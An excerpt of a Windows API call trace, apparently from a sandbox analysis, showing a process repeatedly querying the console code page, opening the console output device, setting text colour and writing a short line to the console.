	[0064.435] GetLastError () returned 0xcb
	[0064.435] GetConsoleOutputCP () returned 0x1b5
	[0064.435] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.435] GetLastError () returned 0xcb
	[0064.435] GetConsoleOutputCP () returned 0x1b5
	[0064.435] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.436] GetLastError () returned 0xcb
	[0064.436] GetConsoleOutputCP () returned 0x1b5
	[0064.436] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.436] GetLastError () returned 0xcb
	[0064.436] GetConsoleOutputCP () returned 0x1b5
	[0064.436] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ed10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ed10) returned 0
	[0064.436] GetLastError () returned 0xcb
	[0064.436] GetConsoleOutputCP () returned 0x1b5
	[0064.436] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ed10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ed10) returned 0
	[0064.436] GetLastError () returned 0xcb
	[0064.436] GetConsoleOutputCP () returned 0x1b5
	[0064.436] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ed10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ed10) returned 0
	[0064.436] GetLastError () returned 0xcb
	[0064.436] GetConsoleOutputCP () returned 0x1b5
	[0064.436] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ed10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ed10) returned 0
	[0064.436] GetLastError () returned 0xcb
	[0064.436] GetConsoleOutputCP () returned 0x1b5
	[0064.436] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ed10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ed10) returned 0
	[0064.437] GetLastError () returned 0xcb
	[0064.437] GetConsoleOutputCP () returned 0x1b5
	[0064.437] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.437] GetLastError () returned 0xcb
	[0064.437] GetConsoleOutputCP () returned 0x1b5
	[0064.437] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.437] GetLastError () returned 0xcb
	[0064.437] GetConsoleOutputCP () returned 0x1b5
	[0064.437] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.437] GetLastError () returned 0xcb
	[0064.437] GetConsoleOutputCP () returned 0x1b5
	[0064.437] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.437] GetLastError () returned 0xcb
	[0064.437] GetConsoleOutputCP () returned 0x1b5
	[0064.437] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.437] GetLastError () returned 0xcb
	[0064.437] GetConsoleOutputCP () returned 0x1b5
	[0064.437] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.437] GetLastError () returned 0xcb
	[0064.437] GetConsoleOutputCP () returned 0x1b5
	[0064.437] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.437] GetLastError () returned 0xcb
	[0064.437] GetConsoleOutputCP () returned 0x1b5
	[0064.437] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.437] GetLastError () returned 0xcb
	[0064.437] GetConsoleOutputCP () returned 0x1b5
	[0064.438] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.438] GetLastError () returned 0xcb
	[0064.438] GetConsoleOutputCP () returned 0x1b5
	[0064.438] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.438] GetLastError () returned 0xcb
	[0064.438] GetConsoleOutputCP () returned 0x1b5
	[0064.438] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.438] GetLastError () returned 0xcb
	[0064.438] GetConsoleOutputCP () returned 0x1b5
	[0064.438] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.438] GetLastError () returned 0xcb
	[0064.438] GetConsoleOutputCP () returned 0x1b5
	[0064.438] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.438] GetLastError () returned 0xcb
	[0064.438] GetConsoleOutputCP () returned 0x1b5
	[0064.438] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.438] GetLastError () returned 0xcb
	[0064.438] GetConsoleOutputCP () returned 0x1b5
	[0064.438] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.438] GetLastError () returned 0xcb
	[0064.438] GetConsoleOutputCP () returned 0x1b5
	[0064.438] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.438] GetLastError () returned 0xcb
	[0064.438] GetConsoleOutputCP () returned 0x1b5
	[0064.438] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.439] GetLastError () returned 0xcb
	[0064.439] GetConsoleOutputCP () returned 0x1b5
	[0064.439] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.439] GetLastError () returned 0xcb
	[0064.439] GetConsoleOutputCP () returned 0x1b5
	[0064.439] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.439] GetLastError () returned 0xcb
	[0064.439] GetConsoleOutputCP () returned 0x1b5
	[0064.439] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.439] GetLastError () returned 0xcb
	[0064.439] GetConsoleOutputCP () returned 0x1b5
	[0064.439] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.439] GetLastError () returned 0xcb
	[0064.439] GetConsoleOutputCP () returned 0x1b5
	[0064.439] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.439] GetLastError () returned 0xcb
	[0064.439] GetConsoleOutputCP () returned 0x1b5
	[0064.439] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.439] GetLastError () returned 0xcb
	[0064.440] GetConsoleOutputCP () returned 0x1b5
	[0064.440] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.440] GetLastError () returned 0xcb
	[0064.440] GetConsoleOutputCP () returned 0x1b5
	[0064.440] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.440] GetLastError () returned 0xcb
	[0064.440] GetConsoleOutputCP () returned 0x1b5
	[0064.440] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.440] GetLastError () returned 0xcb
	[0064.440] GetConsoleOutputCP () returned 0x1b5
	[0064.440] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.440] GetLastError () returned 0xcb
	[0064.440] GetConsoleOutputCP () returned 0x1b5
	[0064.440] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.440] GetLastError () returned 0xcb
	[0064.440] GetConsoleOutputCP () returned 0x1b5
	[0064.440] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.440] GetLastError () returned 0xcb
	[0064.441] GetConsoleOutputCP () returned 0x1b5
	[0064.441] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.441] GetLastError () returned 0xcb
	[0064.441] GetConsoleOutputCP () returned 0x1b5
	[0064.441] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.441] GetLastError () returned 0xcb
	[0064.441] GetConsoleOutputCP () returned 0x1b5
	[0064.441] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.441] GetLastError () returned 0xcb
	[0064.441] GetConsoleOutputCP () returned 0x1b5
	[0064.441] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.441] GetLastError () returned 0xcb
	[0064.441] GetConsoleOutputCP () returned 0x1b5
	[0064.441] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.441] GetLastError () returned 0xcb
	[0064.441] GetConsoleOutputCP () returned 0x1b5
	[0064.441] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.441] GetLastError () returned 0xcb
	[0064.441] GetConsoleOutputCP () returned 0x1b5
	[0064.441] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.441] GetLastError () returned 0xcb
	[0064.441] GetConsoleOutputCP () returned 0x1b5
	[0064.441] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.442] GetLastError () returned 0xcb
	[0064.442] GetConsoleOutputCP () returned 0x1b5
	[0064.442] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.442] GetLastError () returned 0xcb
	[0064.442] GetConsoleOutputCP () returned 0x1b5
	[0064.442] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.442] GetLastError () returned 0xcb
	[0064.442] GetConsoleOutputCP () returned 0x1b5
	[0064.442] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.442] GetLastError () returned 0xcb
	[0064.442] GetConsoleOutputCP () returned 0x1b5
	[0064.442] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.442] GetLastError () returned 0xcb
	[0064.442] GetConsoleOutputCP () returned 0x1b5
	[0064.442] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.442] GetLastError () returned 0xcb
	[0064.442] GetConsoleOutputCP () returned 0x1b5
	[0064.442] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.442] GetLastError () returned 0xcb
	[0064.442] GetConsoleOutputCP () returned 0x1b5
	[0064.442] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.442] GetLastError () returned 0xcb
	[0064.442] GetConsoleOutputCP () returned 0x1b5
	[0064.442] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.442] GetLastError () returned 0xcb
	[0064.442] GetConsoleOutputCP () returned 0x1b5
	[0064.443] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.443] GetLastError () returned 0xcb
	[0064.443] GetConsoleOutputCP () returned 0x1b5
	[0064.443] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.443] GetLastError () returned 0xcb
	[0064.443] GetConsoleOutputCP () returned 0x1b5
	[0064.443] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.443] GetLastError () returned 0xcb
	[0064.443] GetConsoleOutputCP () returned 0x1b5
	[0064.443] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.443] GetLastError () returned 0xcb
	[0064.443] GetConsoleOutputCP () returned 0x1b5
	[0064.443] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.443] GetLastError () returned 0xcb
	[0064.443] GetConsoleOutputCP () returned 0x1b5
	[0064.443] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.443] GetLastError () returned 0xcb
	[0064.443] GetConsoleOutputCP () returned 0x1b5
	[0064.443] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.443] GetLastError () returned 0xcb
	[0064.443] GetConsoleOutputCP () returned 0x1b5
	[0064.443] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.443] GetLastError () returned 0xcb
	[0064.443] GetConsoleOutputCP () returned 0x1b5
	[0064.443] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.443] GetLastError () returned 0xcb
	[0064.443] GetConsoleOutputCP () returned 0x1b5
	[0064.444] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.444] GetLastError () returned 0xcb
	[0064.444] GetConsoleOutputCP () returned 0x1b5
	[0064.444] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.444] GetLastError () returned 0xcb
	[0064.444] GetConsoleOutputCP () returned 0x1b5
	[0064.444] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.444] GetLastError () returned 0xcb
	[0064.444] GetConsoleOutputCP () returned 0x1b5
	[0064.444] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.444] GetLastError () returned 0xcb
	[0064.444] GetConsoleOutputCP () returned 0x1b5
	[0064.444] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.444] GetLastError () returned 0xcb
	[0064.444] GetConsoleOutputCP () returned 0x1b5
	[0064.444] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.444] GetLastError () returned 0xcb
	[0064.444] GetConsoleOutputCP () returned 0x1b5
	[0064.444] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.444] GetLastError () returned 0xcb
	[0064.444] GetConsoleOutputCP () returned 0x1b5
	[0064.445] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.445] GetLastError () returned 0xcb
	[0064.445] GetConsoleOutputCP () returned 0x1b5
	[0064.445] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.445] GetLastError () returned 0xcb
	[0064.445] GetConsoleOutputCP () returned 0x1b5
	[0064.445] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.445] GetLastError () returned 0xcb
	[0064.445] GetConsoleOutputCP () returned 0x1b5
	[0064.445] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.445] GetLastError () returned 0xcb
	[0064.445] GetConsoleOutputCP () returned 0x1b5
	[0064.445] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.445] GetLastError () returned 0xcb
	[0064.445] GetConsoleOutputCP () returned 0x1b5
	[0064.445] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.445] GetLastError () returned 0xcb
	[0064.445] GetConsoleOutputCP () returned 0x1b5
	[0064.445] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.445] GetLastError () returned 0xcb
	[0064.445] GetConsoleOutputCP () returned 0x1b5
	[0064.445] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.445] GetLastError () returned 0xcb
	[0064.445] GetConsoleOutputCP () returned 0x1b5
	[0064.446] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.446] GetLastError () returned 0xcb
	[0064.446] GetConsoleOutputCP () returned 0x1b5
	[0064.446] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.446] GetLastError () returned 0xcb
	[0064.446] GetConsoleOutputCP () returned 0x1b5
	[0064.446] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.446] GetLastError () returned 0xcb
	[0064.446] GetConsoleOutputCP () returned 0x1b5
	[0064.446] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.446] GetLastError () returned 0xcb
	[0064.446] GetConsoleOutputCP () returned 0x1b5
	[0064.446] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.446] GetLastError () returned 0xcb
	[0064.446] GetConsoleOutputCP () returned 0x1b5
	[0064.446] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.446] GetLastError () returned 0xcb
	[0064.446] GetConsoleOutputCP () returned 0x1b5
	[0064.446] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.446] GetLastError () returned 0xcb
	[0064.446] GetConsoleOutputCP () returned 0x1b5
	[0064.446] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.446] GetLastError () returned 0xcb
	[0064.446] GetConsoleOutputCP () returned 0x1b5
	[0064.446] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.446] GetLastError () returned 0xcb
	[0064.446] GetConsoleOutputCP () returned 0x1b5
	[0064.447] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.447] GetLastError () returned 0xcb
	[0064.447] GetConsoleOutputCP () returned 0x1b5
	[0064.447] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ed10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ed10) returned 0
	[0064.447] GetLastError () returned 0xcb
	[0064.447] GetConsoleOutputCP () returned 0x1b5
	[0064.447] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ed10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ed10) returned 0
	[0064.447] GetLastError () returned 0xcb
	[0064.447] GetConsoleOutputCP () returned 0x1b5
	[0064.447] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ed10, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ed10) returned 0
	[0064.447] GetLastError () returned 0xcb
	[0064.452] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17
	[0064.452] GetLastError () returned 0xcb
	[0064.452] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x570ece8 | out: lpConsoleScreenBufferInfo=0x570ece8) returned 1
	[0064.452] GetLastError () returned 0xcb
	[0064.452] GetConsoleOutputCP () returned 0x1b5
	[0064.452] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x570ecf0, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x570ecf0) returned 0
	[0064.452] GetLastError () returned 0xcb
	[0064.453] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
	[0064.453] GetLastError () returned 0xcb
	[0064.453] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x570ed60 | out: lpMode=0x570ed60) returned 1
	[0064.453] GetLastError () returned 0xcb
	[0064.456] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b
	[0064.456] GetLastError () returned 0xcb
	[0064.456] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1b, lpConsoleScreenBufferInfo=0x570ec88 | out: lpConsoleScreenBufferInfo=0x570ec88) returned 1
	[0064.456] GetLastError () returned 0xcb
	[0064.459] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f
	[0064.459] GetLastError () returned 0xcb
	[0064.459] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1f, lpConsoleScreenBufferInfo=0x570ec88 | out: lpConsoleScreenBufferInfo=0x570ec88) returned 1
	[0064.459] GetLastError () returned 0xcb
	[0064.462] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0064.464] GetLastError () returned 0xcb
	[0064.464] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x570ec90 | out: lpConsoleScreenBufferInfo=0x570ec90) returned 1
	[0064.464] GetLastError () returned 0xcb
	[0064.465] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1
	[0064.466] GetLastError () returned 0xcb
	[0064.467] CloseHandle (hObject=0x23) returned 1
	[0064.467] GetLastError () returned 0xcb
	[0064.470] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0064.470] GetLastError () returned 0xcb
	[0064.470] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x570ec90 | out: lpConsoleScreenBufferInfo=0x570ec90) returned 1
	[0064.470] GetLastError () returned 0xcb
	[0064.470] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1
	[0064.470] GetLastError () returned 0xcb
	[0064.471] CloseHandle (hObject=0x23) returned 1
	[0064.471] GetLastError () returned 0xcb
	[0064.471] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
	[0064.471] GetLastError () returned 0xcb
	[0064.471] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x570ecf8 | out: lpMode=0x570ecf8) returned 1
	[0064.471] GetLastError () returned 0xcb
	[0064.474] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
	[0064.474] GetLastError () returned 0xcb
	[0064.474] GetConsoleMode (in: hConsoleHandle=0x23, lpMode=0x570ecdc | out: lpMode=0x570ecdc) returned 1
	[0064.474] GetLastError () returned 0xcb
	[0064.476] WriteConsoleW (in: hConsoleOutput=0x23, lpBuffer=0x254663c*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x570ecdc, lpReserved=0x0 | out: lpBuffer=0x254663c*, lpNumberOfCharsWritten=0x570ecdc*=0x4f) returned 1
	[0064.477] GetLastError () returned 0xcb
	[0064.477] CloseHandle (hObject=0x23) returned 1
	[0064.477] GetLastError () returned 0xcb
	[0064.480] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23
